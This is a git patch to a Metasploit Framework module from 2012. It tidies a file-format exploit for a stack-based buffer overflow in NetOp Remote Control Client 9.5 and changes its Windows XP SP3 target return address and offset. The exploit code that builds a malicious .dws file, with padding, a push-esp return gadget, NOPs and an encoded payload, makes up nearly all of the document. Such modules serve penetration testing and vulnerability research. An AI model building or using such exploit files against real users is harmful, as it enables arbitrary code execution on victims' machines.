From c79060915aa6dfb6b3f866226176a85e44f723fe Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 3 Apr 2012 11:51:58 -0500 Subject: [PATCH] Add Chap0's netop exploit --- modules/exploits/windows/fileformat/netop.rb | 56 ++++++++------------ 1 file changed, 23 insertions(+), 33 deletions(-) diff --git a/modules/exploits/windows/fileformat/netop.rb b/modules/exploits/windows/fileformat/netop.rb index 62465e3db1..e6097a55f2 100644 --- a/modules/exploits/windows/fileformat/netop.rb +++ b/modules/exploits/windows/fileformat/netop.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -14,19 +14,18 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'NetOp Remote Control 9.5 Buffer Overflow', - 'Description' => %q{ + 'Name' => 'NetOp Remote Control Client 9.5 Buffer Overflow', + 'Description' => %q{ This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5. - When opeining a .dws file containing a specially crafted string longer then 520 - characters will allow an attacker to execute arbitraty code. + When opening a .dws file containing a specially crafted string longer then 520 + characters will allow an attacker to execute arbitrary code. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ - 'Ruben Alejandro "chap0"', - + 'Ruben Alejandro "chap0"', ], - 'References' => + 'References' => [ [ 'OSVDB', '72291' ], [ 'URL', 'http://www.exploit-db.com/exploits/17223/' ] @@ -34,52 +33,43 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'ExitFunction' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => 'true' }, - 'Platform' => 'win', - 'Payload' => + 'Platform' => 'win', + 'Payload' => { 'Space' => 2000, 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500 }, - - 'Targets' => + 'Targets' => [ [ 'Windows XP SP3', { - 'Ret' => 0x223159fc, # push esp # ret - NFMNT.dll + 'Ret' => 0x20d6c32c, # push esp # ret - nrp.DLL 'Offset' => 524 } - ], - - [ 'Windows 7', - { - 'Ret' => 0x20d6c32c, # push esp # ret - nrp.DLL - 'Offset' => 524 - } - ], + ] ], - 'Privileged' => false, - 'DisclosureDate'=> 'Apr 28 2011', - 'DefaultTarget' => 0)) + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2011', + 'DefaultTarget' => 0)) register_options( [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.dws']), + OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']), ], self.class) end def exploit - - buffer = rand_text(target['Offset']) - buffer << [target.ret].pack('V') + buffer = rand_text(target['Offset']) + buffer << [target.ret].pack('V') buffer << make_nops(30) buffer << payload.encoded file_create(buffer) - end + end